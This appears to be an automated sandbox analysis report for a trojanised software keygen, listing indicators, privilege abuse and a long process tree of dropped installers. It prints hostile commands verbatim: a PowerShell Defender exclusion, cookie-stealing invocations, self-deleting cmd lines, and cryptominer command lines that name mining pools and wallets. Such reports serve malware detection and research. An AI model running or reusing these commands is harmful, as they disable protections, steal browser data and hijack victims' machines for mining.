5504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 3660 PING.EXE 6024 PING.EXE 4372 PING.EXE 8072 PING.EXE 9880 PING.EXE -
Script User-Agent 12 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 563 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 567 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 595 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 135 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 138 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 557 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 568 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 574 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 603 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 300 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 303 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 552 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2704 setups.tmp 2704 setups.tmp 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe 3728 multitimer.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 956 MicrosoftEdge.exe Token: SeCreateTokenPrivilege 2236 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2236 askinstall20.exe Token: SeLockMemoryPrivilege 2236 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2236 askinstall20.exe Token: SeMachineAccountPrivilege 2236 askinstall20.exe Token: SeTcbPrivilege 2236 askinstall20.exe Token: SeSecurityPrivilege 2236 askinstall20.exe Token: SeTakeOwnershipPrivilege 2236 askinstall20.exe Token: SeLoadDriverPrivilege 2236 askinstall20.exe Token: SeSystemProfilePrivilege 2236 askinstall20.exe Token: SeSystemtimePrivilege 2236 askinstall20.exe Token: SeProfSingleProcessPrivilege 2236 askinstall20.exe Token: SeIncBasePriorityPrivilege 2236 askinstall20.exe Token: SeCreatePagefilePrivilege 2236 askinstall20.exe Token: SeCreatePermanentPrivilege 2236 askinstall20.exe Token: SeBackupPrivilege 2236 askinstall20.exe Token: SeRestorePrivilege 2236 askinstall20.exe Token: SeShutdownPrivilege 2236 askinstall20.exe Token: SeDebugPrivilege 2236 askinstall20.exe Token: SeAuditPrivilege 2236 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2236 askinstall20.exe Token: SeChangeNotifyPrivilege 2236 askinstall20.exe Token: SeRemoteShutdownPrivilege 2236 askinstall20.exe Token: SeUndockPrivilege 2236 askinstall20.exe Token: SeSyncAgentPrivilege 2236 askinstall20.exe Token: SeEnableDelegationPrivilege 2236 askinstall20.exe Token: SeManageVolumePrivilege 2236 askinstall20.exe Token: SeImpersonatePrivilege 2236 askinstall20.exe Token: SeCreateGlobalPrivilege 2236 askinstall20.exe Token: 31 2236 askinstall20.exe Token: 32 2236 askinstall20.exe Token: 33 2236 askinstall20.exe Token: 34 2236 askinstall20.exe Token: 35 2236 askinstall20.exe Token: SeDebugPrivilege 3672 taskkill.exe Token: SeDebugPrivilege 3728 multitimer.exe Token: SeDebugPrivilege 956 MicrosoftEdge.exe Token: SeDebugPrivilege 956 MicrosoftEdge.exe Token: SeDebugPrivilege 956 MicrosoftEdge.exe Token: SeDebugPrivilege 956 MicrosoftEdge.exe Token: SeDebugPrivilege 4412 app.exe Token: SeDebugPrivilege 4412 app.exe Token: SeDebugPrivilege 4412 app.exe Token: SeDebugPrivilege 4412 app.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 904 setups.exe 2704 setups.tmp 956 MicrosoftEdge.exe 4348 MicrosoftEdgeCP.exe 4348 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 1196 wrote to memory of 1108 1196 Embarcadero.RAD.Studio.XE2.Arc.keygen.exe 79 PID 1196 wrote to memory of 1108 1196 Embarcadero.RAD.Studio.XE2.Arc.keygen.exe 79 PID 1196 wrote to memory of 1108 1196 Embarcadero.RAD.Studio.XE2.Arc.keygen.exe 79 PID 1108 wrote to memory of 804 1108 cmd.exe 82 PID 1108 wrote to memory of 804 1108 cmd.exe 82 PID 1108 wrote to memory of 804 1108 cmd.exe 82 PID 1108 wrote to memory of 2696 1108 cmd.exe 83 PID 1108 wrote to memory of 2696 1108 cmd.exe 83 PID 1108 wrote to memory of 2696 1108 cmd.exe 83 PID 1108 wrote to memory of 1168 1108 cmd.exe 84 PID 1108 wrote to memory of 1168 1108 cmd.exe 84 PID 1108 wrote to memory of 1168 1108 cmd.exe 84 PID 1108 wrote to memory of 4000 1108 cmd.exe 85 PID 1108 wrote to memory of 4000 1108 cmd.exe 85 PID 1108 wrote to memory of 4000 1108 cmd.exe 85 PID 804 wrote to memory of 3992 804 keygen-pr.exe 86 PID 804 wrote to memory of 3992 804 keygen-pr.exe 86 PID 804 wrote to memory of 3992 804 keygen-pr.exe 86 PID 4000 wrote to memory of 956 4000 keygen-step-4.exe 100 PID 4000 wrote to memory of 956 4000 keygen-step-4.exe 100 PID 1168 wrote to memory of 1480 1168 keygen-step-3.exe 88 PID 1168 wrote to memory of 1480 1168 keygen-step-3.exe 88 PID 1168 wrote to memory of 1480 1168 keygen-step-3.exe 88 PID 1480 wrote to memory of 3660 1480 cmd.exe 90 PID 1480 wrote to memory of 3660 1480 cmd.exe 90 PID 1480 wrote to memory of 3660 1480 cmd.exe 90 PID 3992 wrote to memory of 4036 3992 key.exe 91 PID 3992 wrote to memory of 4036 3992 key.exe 91 PID 3992 wrote to memory of 4036 3992 key.exe 91 PID 956 wrote to memory of 3728 956 MicrosoftEdge.exe 92 PID 956 wrote to memory of 3728 956 MicrosoftEdge.exe 92 PID 956 wrote to memory of 904 956 MicrosoftEdge.exe 93 PID 956 wrote to memory of 904 956 MicrosoftEdge.exe 93 PID 956 wrote to memory of 904 956 MicrosoftEdge.exe 93 PID 4000 wrote to memory of 2236 4000 keygen-step-4.exe 94 PID 4000 wrote to memory of 2236 4000 keygen-step-4.exe 94 PID 4000 wrote to memory of 2236 4000 keygen-step-4.exe 94 PID 904 wrote to memory of 2704 904 setups.exe 95 PID 904 wrote to memory of 2704 904 setups.exe 95 PID 904 wrote to memory of 2704 904 setups.exe 95 PID 2236 wrote to memory of 3668 2236 askinstall20.exe 97 PID 2236 wrote to memory of 3668 2236 askinstall20.exe 97 PID 2236 wrote to memory of 3668 2236 askinstall20.exe 97 PID 3668 wrote to memory of 3672 3668 cmd.exe 99 PID 3668 wrote to memory of 3672 3668 cmd.exe 99 PID 3668 wrote to memory of 3672 3668 cmd.exe 99 PID 4000 wrote to memory of 4496 4000 keygen-step-4.exe 105 PID 4000 wrote to memory of 4496 4000 keygen-step-4.exe 105 PID 4000 wrote to memory of 4496 4000 keygen-step-4.exe 105 PID 4496 wrote to memory of 4576 4496 Full Program Features.exe 106 PID 4496 wrote to memory of 4576 4496 Full Program Features.exe 106 PID 4496 wrote to memory of 4576 4496 Full Program Features.exe 106 PID 4000 wrote to memory of 4612 4000 keygen-step-4.exe 107 PID 4000 wrote to memory of 4612 4000 keygen-step-4.exe 107 PID 4000 wrote to memory of 4612 4000 keygen-step-4.exe 107 PID 3728 wrote to memory of 4740 3728 multitimer.exe 108 PID 3728 wrote to memory of 4740 3728 multitimer.exe 108 PID 4576 wrote to memory of 4752 4576 WScript.exe 109 PID 4576 wrote to memory of 4752 4576 WScript.exe 109 PID 4576 wrote to memory of 4752 4576 WScript.exe 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\Embarcadero.RAD.Studio.XE2.Arc.keygen.exe"C:\Users\Admin\AppData\Local\Temp\Embarcadero.RAD.Studio.XE2.Arc.keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:3660
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe" 1 3.1617432433.60680f715a339 1016⤵
- Executes dropped EXE
PID:4740 -
C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe" 2 3.1617432433.60680f715a3397⤵PID:5092
-
C:\Users\Admin\AppData\Local\Temp\i33vn12fdjy\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\i33vn12fdjy\Setup3310.exe" /Verysilent /subid=5778⤵PID:2320
-
C:\Users\Admin\AppData\Local\Temp\is-2RF4D.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-2RF4D.tmp\Setup3310.tmp" /SL5="$702D8,138429,56832,C:\Users\Admin\AppData\Local\Temp\i33vn12fdjy\Setup3310.exe" /Verysilent /subid=5779⤵PID:4532
-
C:\Users\Admin\AppData\Local\Temp\is-64N5L.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-64N5L.tmp\Setup.exe" /Verysilent10⤵PID:4164
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:5488
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:4352
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5468
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:5456
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\is-E62RA.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-E62RA.tmp\LabPicV3.tmp" /SL5="$900FC,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:5696
-
C:\Users\Admin\AppData\Local\Temp\is-5Q3PN.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-5Q3PN.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:5160
-
C:\Users\Admin\AppData\Local\Temp\8d-006fb-ffc-19793-00f9e64538b5c\Xalilolyha.exe"C:\Users\Admin\AppData\Local\Temp\8d-006fb-ffc-19793-00f9e64538b5c\Xalilolyha.exe"14⤵PID:4108
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bnw40exl.nve\md6_6ydj.exe & exit15⤵PID:6540
-
C:\Users\Admin\AppData\Local\Temp\bnw40exl.nve\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\bnw40exl.nve\md6_6ydj.exe16⤵PID:5500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\skdwckxt.qvy\askinstall31.exe & exit15⤵PID:6752
-
C:\Users\Admin\AppData\Local\Temp\skdwckxt.qvy\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\skdwckxt.qvy\askinstall31.exe16⤵PID:6744
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:7076
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:4516
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zygeealf.jgr\toolspab1.exe & exit15⤵PID:6932
-
C:\Users\Admin\AppData\Local\Temp\zygeealf.jgr\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\zygeealf.jgr\toolspab1.exe16⤵PID:6360
-
C:\Users\Admin\AppData\Local\Temp\zygeealf.jgr\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\zygeealf.jgr\toolspab1.exe17⤵PID:7060
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ixotiru.w3e\setup_10.2_mix.exe & exit15⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\5ixotiru.w3e\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\5ixotiru.w3e\setup_10.2_mix.exe16⤵PID:8140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dbdekgfp.1pt\GcleanerWW.exe /mixone & exit15⤵PID:7208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y2hmgmbr.0s3\app.exe /8-2222 & exit15⤵PID:7440
-
C:\Users\Admin\AppData\Local\Temp\y2hmgmbr.0s3\app.exeC:\Users\Admin\AppData\Local\Temp\y2hmgmbr.0s3\app.exe /8-222216⤵PID:7856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0o0sllzc.auy\file.exe & exit15⤵PID:7236
-
C:\Users\Admin\AppData\Local\Temp\0o0sllzc.auy\file.exeC:\Users\Admin\AppData\Local\Temp\0o0sllzc.auy\file.exe16⤵PID:7580
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"17⤵PID:7264
-
C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:9156
-
C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe" 1 3.1617432622.6068102eb76fc 10119⤵PID:8160
-
C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe" 2 3.1617432622.6068102eb76fc20⤵PID:5436
-
C:\Users\Admin\AppData\Local\Temp\4mymhbbcaf4\vpn.exe"C:\Users\Admin\AppData\Local\Temp\4mymhbbcaf4\vpn.exe" /silent /subid=48221⤵PID:9136
-
C:\Users\Admin\AppData\Local\Temp\is-QSL5B.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-QSL5B.tmp\vpn.tmp" /SL5="$90310,15170975,270336,C:\Users\Admin\AppData\Local\Temp\4mymhbbcaf4\vpn.exe" /silent /subid=48222⤵PID:6480
-
-
-
C:\Users\Admin\AppData\Local\Temp\tmmegomch0w\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\tmmegomch0w\cpyrix.exe" /VERYSILENT21⤵PID:6100
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵PID:6532
-
C:\Users\Admin\AppData\Local\Temp\a27a1af8-6393-40c8-a2c7-d779a08bf322\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a27a1af8-6393-40c8-a2c7-d779a08bf322\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a27a1af8-6393-40c8-a2c7-d779a08bf322\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run23⤵PID:9212
-
C:\Users\Admin\AppData\Local\Temp\a27a1af8-6393-40c8-a2c7-d779a08bf322\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a27a1af8-6393-40c8-a2c7-d779a08bf322\AdvancedRun.exe" /SpecialRun 4101d8 921224⤵PID:9264
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force23⤵PID:9848
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 123⤵PID:10176
-
C:\Windows\SysWOW64\timeout.exetimeout 124⤵
- Delays execution with timeout.exe
PID:9772
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"23⤵PID:7848
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵PID:7420
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵PID:9476
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bo0hnecejzm\2t3xdmxbadq.exe"C:\Users\Admin\AppData\Local\Temp\bo0hnecejzm\2t3xdmxbadq.exe" /ustwo INSTALL21⤵PID:6128
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "2t3xdmxbadq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\bo0hnecejzm\2t3xdmxbadq.exe" & exit22⤵PID:9732
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "2t3xdmxbadq.exe" /f23⤵
- Kills process with taskkill
PID:392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rtvzyvzqmvt\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\rtvzyvzqmvt\Setup3310.exe" /Verysilent /subid=57721⤵PID:6560
-
C:\Users\Admin\AppData\Local\Temp\is-DPKVF.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-DPKVF.tmp\Setup3310.tmp" /SL5="$407C6,138429,56832,C:\Users\Admin\AppData\Local\Temp\rtvzyvzqmvt\Setup3310.exe" /Verysilent /subid=57722⤵PID:8480
-
C:\Users\Admin\AppData\Local\Temp\is-IUEHN.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IUEHN.tmp\Setup.exe" /Verysilent23⤵PID:9624
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uluq1i2xpcz\app.exe"C:\Users\Admin\AppData\Local\Temp\uluq1i2xpcz\app.exe" /8-2321⤵PID:2356
-
-
C:\Users\Admin\AppData\Local\Temp\1spw5l3igwt\vict.exe"C:\Users\Admin\AppData\Local\Temp\1spw5l3igwt\vict.exe" /VERYSILENT /id=53521⤵PID:8956
-
C:\Users\Admin\AppData\Local\Temp\is-G68EV.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-G68EV.tmp\vict.tmp" /SL5="$20816,870426,780800,C:\Users\Admin\AppData\Local\Temp\1spw5l3igwt\vict.exe" /VERYSILENT /id=53522⤵PID:7708
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E51GD7V66U\setups.exe"C:\Users\Admin\AppData\Local\Temp\E51GD7V66U\setups.exe" ll18⤵PID:9148
-
C:\Users\Admin\AppData\Local\Temp\is-LU2EH.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-LU2EH.tmp\setups.tmp" /SL5="$20742,635399,250368,C:\Users\Admin\AppData\Local\Temp\E51GD7V66U\setups.exe" ll19⤵PID:6776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"17⤵PID:8168
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"17⤵PID:8096
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:8644
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:8204
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"17⤵PID:8800
-
C:\Users\Admin\AppData\Roaming\CCDC.tmp.exe"C:\Users\Admin\AppData\Roaming\CCDC.tmp.exe"18⤵PID:5768
-
C:\Users\Admin\AppData\Roaming\CCDC.tmp.exe"C:\Users\Admin\AppData\Roaming\CCDC.tmp.exe"19⤵PID:6440
-
-
-
C:\Users\Admin\AppData\Roaming\DBB3.tmp.exe"C:\Users\Admin\AppData\Roaming\DBB3.tmp.exe"18⤵PID:5284
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\DBB3.tmp.exe19⤵PID:7584
-
C:\Windows\SysWOW64\timeout.exetimeout /t 320⤵
- Delays execution with timeout.exe
PID:8188
-
-
-
-
C:\Users\Admin\AppData\Roaming\DB93.tmp.exe"C:\Users\Admin\AppData\Roaming\DB93.tmp.exe"18⤵PID:8620
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:7576
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵PID:4692
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"18⤵PID:9196
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:8072
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"17⤵PID:5012
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jfv4ysmu.zcc\Four.exe & exit15⤵PID:7912
-
C:\Users\Admin\AppData\Local\Temp\jfv4ysmu.zcc\Four.exeC:\Users\Admin\AppData\Local\Temp\jfv4ysmu.zcc\Four.exe16⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:9056
-
C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe" 1 3.1617432625.60681031ed54a 10418⤵PID:5228
-
C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MB4FR26QLM\multitimer.exe" 2 3.1617432625.60681031ed54a19⤵PID:6448
-
C:\Users\Admin\AppData\Local\Temp\501qjlfb1gx\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\501qjlfb1gx\cpyrix.exe" /VERYSILENT20⤵PID:8208
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵PID:2692
-
C:\Users\Admin\AppData\Local\Temp\58b36439-9183-4f1e-9f22-c936dfb960bc\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\58b36439-9183-4f1e-9f22-c936dfb960bc\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\58b36439-9183-4f1e-9f22-c936dfb960bc\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run22⤵PID:9236
-
C:\Users\Admin\AppData\Local\Temp\58b36439-9183-4f1e-9f22-c936dfb960bc\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\58b36439-9183-4f1e-9f22-c936dfb960bc\AdvancedRun.exe" /SpecialRun 4101d8 923623⤵PID:7516
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force22⤵PID:9964
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 122⤵PID:9760
-
C:\Windows\SysWOW64\timeout.exetimeout 123⤵
- Delays execution with timeout.exe
PID:6724
